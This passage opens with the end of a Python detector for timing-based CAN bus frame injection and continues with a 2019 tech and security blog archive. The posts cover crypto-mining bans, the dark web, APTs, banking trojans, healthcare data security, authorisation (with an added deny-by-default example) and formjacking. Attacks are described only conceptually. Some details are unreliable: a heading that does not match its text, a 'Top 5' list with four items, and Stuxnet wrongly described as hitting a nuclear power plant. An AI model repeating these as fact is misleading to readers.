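    lines.sort()  # all timestamps share the same width, so string order is time order
    return lines


def baseline_periods(frames: List[Frame], train_seconds: float = 1.0,
                     min_gaps: int = 5) -> Dict[int, float]:
    """Median inter-arrival time per ID over an initial window assumed to be clean.
    IDs seen fewer than min_gaps times are treated as aperiodic and not modelled."""
    t0 = frames[0][0]
    last: Dict[int, float] = {}
    gaps: Dict[int, List[float]] = defaultdict(list)
    for ts, cid, _ in frames:
        if ts - t0 > train_seconds:
            break
        if cid in last:
            gaps[cid].append(ts - last[cid])
        last[cid] = ts
    return {cid: median(g) for cid, g in gaps.items() if len(g) >= min_gaps}


def detect_injection(frames: List[Frame], baseline: Dict[int, float],
                     ratio: float = 0.5) -> List[Tuple[float, int, str]]:
    """Flag any frame of a periodic ID that arrives in under `ratio` of its period.
    During a flood both spoofed and genuine frames of that ID get flagged: the
    detector pins down the ID and the time window, not which frame is forged."""
    alerts: List[Tuple[float, int, str]] = []
    last: Dict[int, float] = {}
    for ts, cid, data in frames:
        if cid in baseline and cid in last and ts - last[cid] < ratio * baseline[cid]:
            alerts.append((ts, cid, data.hex()))
        last[cid] = ts
    return alerts


def run_demo() -> Tuple[Dict[int, float], List[Tuple[float, int, str]]]:
    """Learn periods from the constructed log and return (baseline, alerts)."""
    frames = [f for f in map(parse_line, build_sample_log()) if f is not None]
    baseline = baseline_periods(frames)
    return baseline, detect_injection(frames, baseline)


if __name__ == "__main__":
    periods, found = run_demo()
    for cid, period in sorted(periods.items()):
        print(f"ID 0x{cid:03X}: period {period * 1000:.1f} ms")
    print(f"{len(found)} frames flagged; first at {found[0][0]:.4f} (ID 0x{found[0][1]:03X})")
```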


12

April, 2019

Chinese Government Plans To Ban Crypto Currencies

The Chinese Government will soon ban all of the country's cryptocurrency mining operations. ...
A new paper, including a proposal to prohibit the mining of cryptocurrencies like Bitcoin, has been published by China's National Development and Reform Commission (NDRC), citing concerns that crypto-mining is a waste of valuable resources, which is hard to disagree with when you look at the horrible environmental impact.
While China once hosted approximately 70% of Bitcoin mining and 90% of trades, the authorities have carried out an almost two-year campaign to shrink the crypto industry, amid concerns about speculative bubbles, fraud and wasteful energy use.
Among many other industries, Bitcoin mining is included in the list of sectors to be eliminated entirely because of environmental issues, waste of resources, safety hazards and non-compliance with regulations.
Bitcoin and other cryptocurrencies are mined using specialist computers that consume huge amounts of energy. That power consumption now equals the normal usage of entire countries and causes serious damage to the planet. As the South China Morning Post points out, coal-dependent regions of China such as Xinjiang and Inner Mongolia have become popular destinations for crypto-miners looking for cheap electricity.
Bitcoin traders said that the government's move did not surprise them. "Bitcoin mining wastes a lot of power," said one Chinese bitcoin trader who declined to be named because of the sensitivity of the situation.
China's mining ban is part of the country's larger push against cryptocurrencies in recent years. In September 2017, the People's Bank of China banned initial coin offerings (ICOs), but crypto enthusiasts believe that prohibition is easy to circumvent. A prohibition on cryptomining, however, would be much harder to evade, because the energy consumption alone tends to give away the location of the computers needed to do it.
One of the founding myths of cryptocurrencies is that fake money such as Bitcoin does not depend on society at large to function. The truth could not be more different: Bitcoin and others rely on modern infrastructure and low-cost energy to keep operating, and as governments start cracking down on cryptocurrencies, they will become less appealing to mainstream financial and consumer institutions.
Given the amount of damage that cryptocurrencies do to the planet, Bitcoin has become nothing more than a death cult for speculators. And while many things are wrong with the Chinese government, a ban on cryptomining appears to be a perfectly sensible step in the face of global environmental disaster.
Last week, Bitcoin's price increased by nearly 20%, its best day since the height of the 2017 bubble, and for the first time since mid-November; analysts and traders admitted they were puzzled by the increase.
On Tuesday, Bitcoin, which accounts for approximately half of the cryptocurrency market, was down about 1.4%, while other major coins such as Ethereum and Ripple's XRP fell by similar amounts. Traders in London said the impact of the Chinese move on the market was unclear.
Since 2017, when regulators began to ban initial coin offerings and shut down local cryptocurrency trading, the cryptocurrency sector in China has been under intense scrutiny.
The review period ends on 7 May, after which the final decision is due to be announced.


11

April, 2019

The Dark Web and its secrets

Ever wondered why you cannot find a specific website on the internet that two of your friends were talking about? Did you ever think about how those people in the subway got the information about a particular incident when there is no information available about it anywhere? ...
There could be a magical or secret place where all the information is coming from. This blog discusses the whereabouts of that hidden place, called the dark web, and what happens therein.
The dark web is a secret piece of the world wide web or the internet which can only be accessed by using highly specialised software, configuring the computer, the web browser or both in a particular manner, or by having special authorisation to access the dark web. The websites present inside the dark web can be accessed via a web browser just like any other regular website available on the internet once a person has got into the dark web. The websites that are within the dark web are not searchable using your daily search engine as they are hidden and hence, cannot be indexed by those search engines. Such websites can only be accessed if a person knows the exact address of the website and has access to the dark web.
The dark web contains many different websites that are used by people for various different purposes. These purposes are mostly illegal. There are special markets present inside the dark web that criminals use to sell illegal products or substances, such as illegal drugs, weapons and secrets. The payment mode that most of the dark web sites use is cryptocurrencies. People who are newbies in surfing the dark web could fall prey to criminals who might fool them into buying illegal or fake things under the cover of a legitimate product or get duped into paying money for a product and not actually receiving the item. For example, Bob is visiting the dark web for the very first time and finds a shopping website on which he sees a gaming console that is being sold for a price that is way less than the actual selling price of that console in the outside market. Bob gets tempted to buy the gaming console. Knowing very little of the dangers that come along with shopping on the dark web, Bob places an order for the console using some cryptocurrency. After the money is transferred, he gets a receipt, and after a few days, the product is received by him. Bob sees that the box is exactly like the official box of the gaming console that he ordered, but when he opens the box, he finds that instead of the gaming console the box contains someone’s used clothes, a bottle of rat poison, some bricks, and a weird looking stuffed toy. Bob becomes a victim of the cyber-criminals who set up the shopping website on the dark web. Hence, it is not necessary that anything you buy on the dark web would be the exact thing that you thought it would be.
The dark web also contains markets that people could use to hire assassins to kill other people. It also has websites that are created by cyber-criminals who sell or rent out several different types of exploits or malware to other evil hackers. The cyber-criminals take advantage of the dark web as it offers high anonymity and it is difficult to track the threat actor’s activities on the dark web. Groups of malicious actors which include paedophiles, criminals and terrorists also use the dark web for their activities and for staying hidden from law enforcement agencies. Even whistleblowers use the dark web to communicate with journalists and leak out secrets.


10

April, 2019

Microsoft HoloLens and Battle Field

Microsoft drew a ton of criticism when it was revealed last November that it had taken on a $479 million contract to provide the U.S. Armed Forces with an Integrated Visual Augmentation System (IVAS). ...
Many Microsoft employees wrote a letter to CEO Satya Nadella saying that they had not signed up to develop weapons for the army. In an interview with CNN, Mr. Nadella defended his company's decision.
Thanks to an exclusive demo obtained by CNBC, we now have an idea of what this HoloLens implementation will look like on the battlefield. The company did not, however, say how much each military version, called HoloLens 2 IVAS, will cost.
But it's what's inside the glasses that counts, and CNBC reports that this prototype of the future of warfare is pretty much what first-person shooter video games have imagined for years: a heads-up display showing your exact compass heading just above your field of view and your position on a virtual map relative to your squad mates, not to mention a video-game-like virtual reticle.

Microsoft is modifying the modern battlefield
HoloLens can display 3D images, location and other information on its screen. When CNBC's technology product editor Todd Haselton first put the device on, it showed a bird's-eye view of the building where he stood; it looked very much like a satellite map.
An arrow showed his direction as he moved his head, and dots represented other squad members. Todd described the whole experience as a real-life version of "Call of Duty".
The HoloLens can also replace night vision goggles by providing thermal imaging. Army Secretary Ryan McCarthy called this feature a "game changer" and claimed that "Russia, China and other potential opponents who know about these capabilities won't want to engage us." A soldier can also target the enemy while wearing the device.
Microsoft and the Army are working on making the current HoloLens 2 IVAS iteration much smaller and ultimately turning it into a pair of regular sunglasses.
Currently the existing HoloLens 2 is too large to work with existing helmets, but one Army leader expected a sunglass-sized unit within six months. We wouldn't count on that (it would probably mean moving many components off the helmet or onto the soldier's body), but IVAS development has only been going on for a couple of months. Army Secretary Ryan McCarthy said that by 2022 and 2023 "thousands and thousands" of soldiers could be using IVAS, with wider deployment by 2028.
McCarthy added that IVAS will increase the precision of soldiers and so ensure that only enemies are killed, not innocent civilians. Contrary to what Microsoft and the Army may expect, this explanation and demo will not dispel the doubts of the employees and experts who believe that tech giants and the Army should not work together on a large scale; rather, it confirms the concern that the device will function just as people were afraid it would.
The US Army initially requested a few thousand headsets, although Reuters later reported that the military could eventually purchase more than 100,000 of them. The Army told CNBC it hopes to field the device to "thousands and thousands of soldiers across the force" as early as 2022 and to complete deployment by 2028.


09

April, 2019

Advanced Persistent Threats

An organisation that is a part of the critical infrastructure of a nation usually contains sensitive information that needs to be protected against the threats that try to target the nation's vital functions....
This blog discusses the advanced persistent threats and how they are dangerous to a nation's security.
Advanced Persistent Threats, or APTs, are threats that remain in a network for extended periods of time without being detected. They keep performing malicious activities such as data exfiltration while inside the network, moving from one system to another and from one part of the network to another. This is a stealthy type of attack and might involve a single person or a group of people who gain unauthorised access to a target network; these people or groups may or may not be state-sponsored. All APT operations require a very high level of covertness throughout, and their motives are usually related to business or politics. The term "advanced" signifies that APTs use highly sophisticated techniques, through the use of malware, to exploit the vulnerabilities present on the target systems. "Persistent" signifies that an external command and control entity continuously monitors and extracts data from a specific target. The term "threat" indicates that humans are involved in orchestrating the attack.
APTs usually have both the capability and the intent to target a specific entity. They use a wide variety of techniques to gather intelligence, access the sensitive information stored in the target's systems and conduct espionage. Some of the methods APTs use to execute their malicious operations are supply chain compromise, infected media, and human intelligence and deception. Individual attackers are not usually referred to as APTs, as they lack the resources to be either advanced or persistent, even if they want to hack a particular target.
Let's look at a few examples of APTs. The Stuxnet worm that was used to attack Iran's nuclear power plant was one example of an APT: the Iranian government can consider the perpetrators an APT because the attackers were in their network for a very long time and were consistently attacking their systems. Other examples of Advanced Persistent Threats are APT28 and APT29, which authorities believe to be state-sponsored.
APTs are highly dangerous once they get into a network, as they have the resources to use techniques never seen before that are hard to detect with the usual security controls. This is why it is necessary to exercise due diligence and work as a team to create secure infrastructure, as it is only then that great solutions come into existence.


05

April, 2019

Facebook Caught Asking Email Account Passwords

It wasn't even a month since Facebook admitted that it had stored on its servers millions of user passwords in plaintext. ...
Now, if you want to use the social media platform, Facebook wants some users to hand over their email account passwords.
This sketchy Facebook behavior was first spotted by e-Sushi, an anonymous security researcher, and reported by the Daily Beast. Apparently, new users flagged as suspicious by Facebook's systems were directed to a dialog box requesting their email password to verify their accounts.
Facebook's new move is actually phishing, as it asks users to provide the password for the email account they used to sign up on the platform.
Below the message there is a form field that specifically asks for the user's "email password." You can read the complete message shown on the sign-in page.
It should be noted that users who have tried to register with certain email providers, including Yandex and GMX, have been asked to confirm their email address by sending their password to Facebook directly.
Users of other email providers such as Google's Gmail do not see this option, however, because Gmail uses the OAuth authorization protocol to verify your identity securely without asking for your password.
Furthermore, if a new user chooses to enter their email account password in Facebook, another pop-up appears stating that Facebook is "importing contacts", without even asking for the user's consent.
In its defense, Facebook says this screen was only shown to a small number of people and was meant to save people from going through an extra step while signing up for a Facebook account.
People can always choose to confirm their account by sending a code to their phone or by sending a link to their email, a Facebook spokesman told the Daily Beast. "That said, we understand that the option to verify passwords is not the best way to do this, so we will stop offering it."


04

April, 2019

Smartphones causing security and privacy concerns

Everyone loves a new smartphone and the good feeling they get while unboxing it and then finally holding it for the first time ever. ...
That's just the external part of the smartphone. After turning it on, people set it up to their liking and start using it in their daily lives. But what if that same smartphone becomes a hole in your security and privacy, telling external entities about every activity you perform on it, or around it while it sits in your pocket, in your bag or on the table? This blog discusses how smartphones have become a major cause of concern about the security and privacy of their users.
A smartphone is a mobile phone with multiple smart features that allow its users to play music, take photographs, make videos, play games and perform other activities that a person could also perform on a desktop computer. Many manufacturers make smartphones to suit the needs of different types of people and to fit any budget: these phones can be very cheap or very expensive, and people buy the one they like depending on their wants. The expensive phones are usually made by top brands and are less likely to exfiltrate data to external entities, as these brands tend to make sure their devices are secure, but that is not always the case. The main problematic devices are the cheap low-end smartphones that tempt a massive number of users, people who do not want to shell out the extra money for a better, and perhaps more secure, phone. It is, however, not a given that a more expensive smartphone is more secure, as in the case of one of the major smartphone manufacturers whose phones were found to be secretly sending users' personal data to China.
Many cheap smartphones have been found to send data to external servers, most of which were located in China. The companies that made these phones and the software described the issue as a mistake, but even after it was discovered, the companies that put the software on the cheap smartphones were found to be still loading it onto other phones. The phones send the victims' data to external servers without their permission, which makes the situation even worse as it adds to the already present concerns about security vulnerabilities. The data these cheap phones could steal includes the users' contacts, SMS messages, call logs, etc. One might never learn what information is being stolen from their device, or even that it is being stolen in the first place.
Any smartphone could be compromised, and as they remain with a user for almost the whole duration of the day, and everywhere the user goes, smartphones could pose a risk to the user's privacy. This could be possible if an attacker has compromised the phone, and for example, installed spyware on it to listen to the victims' conversations through the phone's microphone or record videos and click pictures through the phone's camera and then exfiltrate them via the spyware.


03

April, 2019

Ubuntu 19.04 Disco Dingo Beta Version Released.

Finally, Ubuntu 19.04 Disco Dingo Beta is here. The Ubuntu team announced the release for Desktop, Server and Cloud in its official blog post. The stable release date is April 18, 2019.
Of course, the 19.04 release also features betas for official Ubuntu flavours such as Ubuntu MATE, Lubuntu, Kubuntu, Ubuntu Budgie, Ubuntu Studio, Xubuntu, and Ubuntu Kylin.
I'd like to tell you a bit about the codename Disco Dingo before talking about the new changes shipping with 19.04.
If you know Ubuntu and its releases, you must know that each Ubuntu codename consists of two words starting with the same letter— an adjective and an animal name. Dingo here refers to a native Australian dog and Disco is used for both a genre of dance music and discotheques.

What’s new in Ubuntu 19.04?
Starting with the kernel, Ubuntu 19.04 Beta ships with Linux kernel 5.0. While 5.0 marked a large numerical jump from the 4.x series to the 5.x series, it did not bring many fancy features.
On the desktop environment front is GNOME 3.32 Taipei, which comes with a refreshed visual design that modernizes the overall appearance. The Ubuntu Desktop team tweaks the GNOME Shell somewhat, however, so you won't notice all of those differences here. The performance improvements of GNOME 3.32 will certainly benefit users, though.
Other updates include the new desktop icons, new sets of Yaru icons, Mesa 19.0, etc. All major applications and packages are updated to their latest versions. Finally, there is also a new wallpaper.
All in all, it's a polished release that doesn't add any flashy features but is certainly a step in the right direction.
To learn about all the changes shipped with the other official flavours, read their individual release notes published on their project websites.

Download Ubuntu 19.04 Beta ISO and Torrent
To download and test Ubuntu 19.04 Beta, visit http://releases.ubuntu.com/disco/ and grab the ISO image or torrent file, whichever is more convenient. Before you go ahead and install it on your PC, let me make it very clear that this is a development release and is bound to have a few bugs scattered here and there. Install it on a test machine or in a virtual machine.


02

April, 2019

Banking trojans on the heist

Kudos to those who work hard and earn themselves enormous amounts of money. But, is the money you are making safe? ...
Is it safe from prying eyes? Probably not. Attackers nowadays use specific techniques to steal a victim's money and use it for their own purposes. This blog discusses one particular method adversaries use to steal money: banking trojans, which threat actors use to gain access to victims' online banking accounts.
Before we go on to discuss how the actual attack works, let's first find out what a banking trojan is. A banking trojan is a type of malware that attackers use to steal banking information. Malware is any software that performs a malicious activity and can be used to harm victims in many different ways. A trojan is a type of malware that disguises itself as legitimate software installed on a desktop platform or as an app installed on a mobile device. A banking trojan likewise poses as a legitimate app that users download from the internet, such as from software download websites or the Google Play Store. The software users download could be a free game they want to play on their device, a utility application like a calendar app, or any other app they would want to use on their device. The chances of an apparently legitimate app being a banking trojan increase if the app is not appropriately vetted by the people offering the download. Depending on the strain of banking trojan the attackers use, the way the malware extracts banking information varies, and there are several different ways attackers can orchestrate an attack using one.
One example is an attacker choosing to deliver the banking trojan by email. The attacker could send an email containing a link to a website that lets users download a specific game the victim might want to play. The file could be a banking trojan hidden in an APK that victims use to install the game on an Android device. The victim happily downloads the file, installs the game and starts playing it, knowing very little about the actual contents of the file and what the program they installed really is, and with no idea what it is doing on their device. As a banking trojan has been hidden beneath the game, the next time the victim uses a banking app on their smartphone to access their online banking account, their banking information, such as the username, password or other account details, can be stolen. The trojan can use several techniques to accomplish this. A method used by many banking trojan strains is keylogging, which records the keystrokes the victim makes on their device's keyboard. An example of an Android banking trojan is Gustuff, which can steal victims' banking credentials and make automatic transactions in over 100 banking apps and 32 cryptocurrency apps.
Banking trojans are not limited to Android devices. They can infect other platforms as well, such as Windows, iOS and macOS. Zeus is a real-world banking trojan that was identified in 2007 and targets computers running Windows. It spreads via drive-by downloads and spam emails, and once installed it uses keylogging to harvest the victims' banking information and sends it to the attacker. It also joins a botnet so that it can receive further commands from the attacker. Zeus was behind nearly $100 million stolen by cyber-criminals between 2007 and 2010.
Banking trojans can cause a lot of damage to an individual or an organisation. An attacker could send the malware to an employee in the accounts department and get them to install a banking trojan wrapped in the disguise of, let's say, a web browser extension. The malware could then steal the company's bank account details, which could be used to make transfers to the attacker's bank account. This could lead the company to suffer significant losses, which could in turn cost it its reputation among partners, suppliers or stakeholders if it can no longer pay what it owes them.
Another real-world example of a banking trojan is Dridex. In 2015 this trojan alone caused losses of about $40 million, and by 2017 the cost was estimated in the hundreds of millions of dollars. It was mostly detected in European countries, with the UK accounting for almost 60 per cent of all the activity spotted. This malware can bypass User Account Control (UAC) on Windows, which makes it harder to stop.

Read More

01

April, 2019

First Look Of 5G In Shanghai

Shanghai said it became the first district in the world to have both a 5G network and gigabit broadband coverage ...
as China seeks to take the lead over the US and others in the race to develop the next generation of mobile networks.
5G is the latest generation of cellular technology, with download speeds 10 to 100 times faster than 4G LTE systems.
The state-run China Daily reports that Shanghai has built what it claims is the first district with both 5G coverage and gigabit broadband.
The 5G network trial, supported by the state-owned telecommunications companies, officially started on Sunday in Shanghai's Hongkou district, where 5G base stations had been deployed over the previous three months to ensure full coverage, the report stated.
Shanghai's Vice Mayor Wu Qing made the network's first 5G video call on the Mate X, the world's first 5G foldable phone. When the network is fully operational, subscribers will be able to use the service without upgrading their SIM cards.
By the end of 2019 the city intends to build 10,000 5G base stations, and by 2021 the number is expected to exceed 30,000, said Zhang Jianming, deputy director of the Shanghai Municipal Commission of Economy and Informatization, the local regulator for telecoms and industry.
A full network deployment, transmitting at peak rates at least ten times faster than 4G, will contribute to industrial manufacturing, connected cars, healthcare and smart city management, Zhang said.
Zhang also said that these are all strategically critical industries for both Shanghai and China.
In February Shanghai announced the deployment of 5G at Hongqiao railway station, where city hall meetings will be broadcast live and high-resolution films can be downloaded quickly once 5G-capable phones and tablets become available.
Besides speed, 5G also enables real-time (i.e. low-latency) high-definition transmission and will boost the development of the Internet of Things industry.
The station's 5G digital indoor system (DIS) delivered a peak rate of 1.2 Gbps at the launch event, so that passengers on the system can download a 2 GB high-definition film in less than 20 seconds.
In addition, while at the station, it offers high-speed connectivity, 4K HD video calling and multi-channel HD video upload services.
5G will also give cloud services a great boost. The railway stations of the future may be smarter than we can imagine.

Read More

30

March, 2019

Top 5 Smartphone Myths

Almost every one of us uses a smartphone in day-to-day life. ...
Most of us have come across some myths that shape how we use our phones.
Keep reading and we will unveil some of the biggest smartphone myths that most of us believe and follow in our daily lives.
More RAM Is Better

People still think that if your phone has more RAM then it gives you better performance, and that a high amount of RAM is essential.
This is not true.
Having a lot of RAM is nice, but that doesn't mean that, between a 6GB RAM phone and an 8GB RAM phone, the 8GB one is better.
8GB of RAM is good, but it won't give you better performance than the phone with 6GB. What more RAM buys you is that you can keep more apps open in the background, and when you return to them they continue from where you left off instead of restarting.
It all depends on what kind of user you are and how many apps you use in parallel.
Powerbank Charging Isn't Good

I don't know how this story started, but many people still think that if you charge your phone using a power bank then your phone won't charge correctly and that it might even damage your battery.
This is completely false.
The output of a power bank is similar to what your wall adapter gives you, so you can charge your phone from a power bank without any issues.
Airplane Mode Charging

Many of you might have heard that if you charge your phone in airplane mode then it charges faster.
Charging in airplane mode makes hardly any difference to charging speed. It only switches off the phone's radios, which means most apps still run in the background.
For the fastest charge, the only thing you can do is switch the phone off and then charge it.
Phones Crashing An Aeroplane

If you ever visit a petrol pump, you might have seen a board instructing you not to use your phone, not to answer calls and not to take your phone out.
There was a theory long ago that radio frequencies from mobile phones would ignite the fumes emitted by petrol and diesel and cause a fire.
But the FCC (Federal Communications Commission) has stated that there is no documented incident of a wireless phone causing a fire or explosion at a petrol station, and that scientific testing has not established a dangerous link between mobile phones and fuel vapours.
Do let us know in the comments if you've heard of any such myths…

Read More

29

March, 2019

Cyber Security in the Healthcare Industry

There is a saying that 'Health is wealth', and good health depends on the ability of a person keeping themselves in shape and performing other healthy activities. ...
What if a person's health also depended on the security and privacy of their healthcare data? This is true to a great extent today, as the healthcare information about a patient stored in the databases of healthcare institutions can be stolen and used against the patient. This blog discusses the consequences of Protected Health Information (PHI) getting compromised and the state of cyber security in the healthcare industry.
Protected Health Information (PHI) is information about the status of a person's health, the healthcare that has been provided to the person, or any payment made to a healthcare organisation for that care. In general, PHI includes a person's medical records and payment history. If a person's PHI is compromised, they are at high risk of an attacker using that information to target them and cause severe damage to their health. An attacker could steal PHI such as the medication the victim is taking, any allergies they have, any serious injuries they have suffered, or whether they use a medical device such as an electronic pacemaker. The effects of compromised PHI can be damaging to the patient as well as to the healthcare institution. For the patient, the breach can lead to discrimination and to physical harm; for the healthcare organisation, it can cause loss of reputation, loss of business and loss of trust in the community. The organisation could also face legal consequences, such as lawsuits from affected patients or government action for non-compliance with regulations such as HIPAA and HITECH.
One example of a malicious activity involving healthcare information is a threat actor stealing a patient's PHI, finding out that the patient has an electronic pacemaker, and deciding to kill or at least severely hurt the patient. It has been demonstrated that customised software can be used to deliver a shock to a pacemaker wearer from 50 feet away. Another example is an attacker learning from leaked PHI that a patient wears an insulin pump. Demonstrated attacks on insulin pumps that use wireless communication channels allow an attacker, without knowing the pump's identification number, to send commands that make the pump inject more or less insulin than necessary, which could send the patient into hypoglycaemic shock.
Due diligence is essential when securing PHI. If appropriate security controls are not put in place in time, attacks like the ones in these examples can occur and cause severe damage. Defenders need to stay ahead of the attackers so that attacks can be prevented before they happen; it should not be the case that a healthcare organisation finds out it has been hacked long after the event, once the effects have already been felt by the victims.
A real-life example of a breach of healthcare information is the one at UCLA Health. The breach compromised the healthcare information of 4.5 million patients and cost UCLA Health $7.5 million. Officials said that suspicious activity had been detected on the California health system's network, but the organisation was negligent in putting proper security controls in place and learned of the breach only after its systems had already been compromised and healthcare information stolen. Protecting healthcare information, therefore, should be a very high priority.

Read More

28

March, 2019

Misconceptions In Programming

It is always hard for a beginner to start a programming career, collect the resources and get to know them. ...
In my career, people around me keep asking me questions and raising doubts from time to time. This blog is a collection of the most popular questions from beginners.
I'm older, is it all right to begin?

The most common question I am asked is: I am at the end of my working life, or I am older than all the other programmers in the field. Can I catch up with them and become a professional?
In programming and computers, there is no age factor. I'll tell you about one person I met at a hackathon, from my real-life experience. He was approximately 45 years old and had begun coding at 43. He was a PHP developer.
People were in groups at the hackathon, but that person came alone. When the hackathon started, he kept approaching other groups and asking them about their projects, and whether or not he could help them.
Believe it or not, he was more motivated at that age than most of the young people there. He then joined a team, but they did not win. I saw him work for two days in a row, even through the night. So if you believe your age is the problem, you are wrong, because once you've decided, nothing can stop you.
How can I afford I come from a lower class family?

The second major myth is that you must be rich in order to become a programmer. I laugh whenever someone says this.
Sometimes people even ask me to suggest a good school for studying programming. You have plenty of free resources online. I also learned from them. Don't think that free resources aren't as good as paid ones. The truth, however, is that most free resources are much better than the paid ones.
Some people even think that you need a powerful computer to code or to run bigger projects. There are resources like repl.it which allow you to learn and share your code online.
I accept that some high-end frameworks and applications need good computers, but that doesn't mean you are starting big. Take small steps, and who knows, you may earn enough to afford such a computer when you reach that level.
Money can certainly help you on your journey, but it can never fuel it. Go slowly and try not to stop.
What language or technology should I start?
Nowadays, technology has grown to an unimaginable level. There are a million things you can learn, and when there are many options, it's always hard to choose between them.
It doesn't depend on which technology or language you choose but on your dedication. Everything is useful in some way or another. Choose the career you want and begin learning.
Should I be good at math, for being a programmer?
For this question, a big NO. If you're good at math, then your career is as a mathematician, not a programmer.
Mathematics is useful only occasionally, for some advanced technologies, but not all the time.
I have seen a lot of programmers who aren't good at math but are still growing.
I'm a college dropout, do I need a degree?
Programming is the only field in which the number of dropouts is higher than the number of college graduates. Yes, that's true.
You need a degree to work somewhere else. But in programming and computers, all you need is this: how many projects you have worked on and which technologies you know.
Tech companies want to hire people who are not just graduates but people who know what they are doing and how to do it. A degree can never stop you from becoming a programmer; instead, it gives you more time to spend on it.
There's another story, about a person who only finished primary school. He was so curious about computers that he didn't go to school. He had a slow 512 kbps internet connection and an old CPU with a monitor that was only half visible. He borrowed a keyboard from a friend because he couldn't afford one.
After 6 years of struggle, today he owns two companies, one of which identifies efficient programmers and helps them get hired by top technology companies.
His hard work brought him out of all his struggles. This example may be sufficient to understand that a college degree is not required.
Conclusion:
Technology grows day by day. Don't wait for the right time; start now. Who knows, you could be the next big engineer.
Never let your hustle cool down. Let your hunger and fire fuel you. Start today; a whole new world is waiting for you, a world in which your hard work is valued instead of your money or college degree.

Read More

27

March, 2019

Authorisation

Ever tried opening a file and got an error saying you don't have the permission to access that particular file? ...
This is caused by an access control mechanism called authorisation, and this blog discusses the process of authorisation, its usefulness and the risks of not implementing authorisation controls correctly. But before delving deeper into the discussion, let us first differentiate between authentication and authorisation so that none of you gets confused while reading through this blog.
Authentication is the process of verifying that an entity is what it says it is, or in other words, verifying the identity of an entity. For example, verifying a user's credentials when they try to log in to their workstation connected to their organisation's local network: if the user presents genuine credentials, they are authenticated and logged in to the computer. Authorisation, on the other hand, is the process of determining what an entity is allowed to do after it has been authenticated. For example, after the user has logged in to their workstation and from there successfully connected and authenticated to a particular server on the network, they may or may not have access to specific files, folders or file systems. This access to particular resources is controlled by authorisation controls. That is the difference between authentication and authorisation.
Authorisation occurs only after authentication, i.e. only after an entity, such as a user, has been authenticated to a system is it decided what that entity can do. Authorisation controls can be file-system permissions, configuration options at the application level, role-based access control, or need-to-know restrictions. Authorisation can also be enforced at the network level to decide which entities can reach a particular part of a network and which cannot. Authorisation controls can also help detect malicious activity, as any violation of the access control policy can trigger an alert; this depends on the implementation, and it works best when access is denied by default, so that an attempt matching no explicit grant is both refused and logged.
Attacks that leverage the fact that an entity is authorised to do or access something do exist. For example, let's say Bob's account has access to a file server that holds sensitive files. An attacker has been scanning and enumerating Bob's company's network for days and has found that if they could compromise Bob's account they could get access to the company's sensitive data on the file server; eventually they manage to hack into Bob's workstation. They can now read those valuable files on the file server using Bob's account, as his account has the proper authorisation to access them. In this type of attack, the adversaries successfully exploit the fact that Bob's account was authorised to access the file server and the sensitive files stored on it; the authorisation check cannot tell that it is no longer Bob driving the session.
Let's take another type of attack, one that occurs at the network level. In this example, Bob's company's network uses switches to segregate its multiple networks, and the switch that Bob's workstation is connected to has been configured to allow Bob's workstation to reach the network of another department. A threat actor on the same segment could take advantage of this access right by performing an ARP poisoning attack and spoofing the IP address of Bob's workstation. As Bob's IP address is authorised to reach the other department's network, the attacker gains access to that part of the network as well. So even though authorisation controls are good to have, and one should always implement them, attackers can still get around them through attack vectors that compromise the entity, or the network address, that holds the access rights.
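To make the points above concrete, here is an added example (not code from the original post) of a deny-by-default, role-based authorisation check. It shows the three things the post describes: an explicit grant model, a default-deny decision that records every refusal as an alert event for detection, and the fact that the check only sees the authenticated principal, so a compromised session belonging to Bob is indistinguishable from Bob. Paths are normalised before prefix matching so a '..' segment cannot walk out of a granted directory. All roles, names and paths are made up for the example.

```python
"""Added example: deny-by-default role-based authorisation with denial alerts.

Roles, principals and paths below are constructed for illustration only.
"""
import posixpath
from dataclasses import dataclass

# Role -> set of (action, directory prefix) grants. Anything not listed here is denied.
ROLE_GRANTS = {
    "accounts": {("read", "/fileserver/finance/"), ("write", "/fileserver/finance/")},
    "engineering": {("read", "/fileserver/eng/"), ("write", "/fileserver/eng/")},
    "intern": {("read", "/fileserver/eng/public/")},
}

# Denied attempts are appended here; a real deployment would ship them to a SIEM.
ALERTS = []


@dataclass(frozen=True)
class Principal:
    """An authenticated identity. Roles are decided at authentication time;
    authorisation only consumes them and never re-checks who is behind the session."""
    name: str
    roles: frozenset


def normalise(resource: str) -> str:
    """Collapse '.' and '..' so that prefix matching is done on the real path."""
    return posixpath.normpath(resource)


def authorise(principal: Principal, action: str, resource: str) -> bool:
    """Return True only if some role of the principal explicitly grants action on resource.

    Every other case is refused and logged as an alert (default deny)."""
    path = normalise(resource)
    for role in principal.roles:
        for granted_action, prefix in ROLE_GRANTS.get(role, ()):
            # prefix ends with '/', so '/fileserver/eng/public-archive/' cannot match '/fileserver/eng/public/'
            if granted_action == action and path.startswith(prefix):
                return True
    ALERTS.append({"principal": principal.name, "action": action, "resource": path})
    return False


if __name__ == "__main__":
    bob = Principal("bob", frozenset({"accounts"}))
    intern = Principal("eve", frozenset({"intern"}))
    print(authorise(bob, "read", "/fileserver/finance/q1-ledger.xlsx"))        # True
    print(authorise(intern, "read", "/fileserver/eng/public/../design.doc"))   # False: normalises outside the grant
    print(ALERTS)
```

Note what this cannot do: `authorise(bob, ...)` returns True whether the request comes from Bob at his desk or from an attacker who has taken over his workstation, which is exactly the gap the Bob scenario above exploits. Authorisation decides what an identity may do; detecting that the identity has been hijacked is a separate control.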

Read More

26

March, 2019

Formjacking

Man- I just got a message to pay our credit card bill, and it is way too high! Did you use it to buy something?
Wife- What? No. I did not use the credit card.
Man- What? I'll have to check the credit card statement then. Wait. Oh my god! I see some transactions made to some electronics store! We have to report this to the credit card company! ...

This is the kind of conversation you might come across whenever someone's credit card is charged for an unauthorised transaction. There are multiple ways in which credit card information can be stolen and used by adversaries. In this blog, we discuss a particular technique attackers use that leverages web site forms to steal this information.
The technique is called formjacking, and it is a type of cyber-attack in which attackers inject malicious scripts into a web page, especially one on which a user enters payment information while buying something online, to steal the data the victim enters into the forms on that page. Attackers mainly use this attack to steal payment information, such as the victim's credit card details, and then use those details to make unauthorised transactions and buy things for themselves.
Many web applications include some kind of payment portal. People increasingly buy what they want from online shopping sites: groceries, clothes, shoes, electronics, etc., so that they don't have to go out and look for the things they like. Going out to shop takes time, so they stay at home and order products or services instead; some even shop online from the office so that they can go straight home and relax afterwards. People choose convenience wherever they can get it. Attackers take advantage of the changing times and of people shopping on the internet to gain financially, using attacks like formjacking to loot people of their hard-earned money. This attack can be compared to the card skimmers criminals fit to ATMs to steal card data. What makes formjacking even scarier, however, is that users have practically no way of telling whether the payment page has been rigged and a malicious script injected into it: the page looks and works exactly as it should, and the payment still goes through.
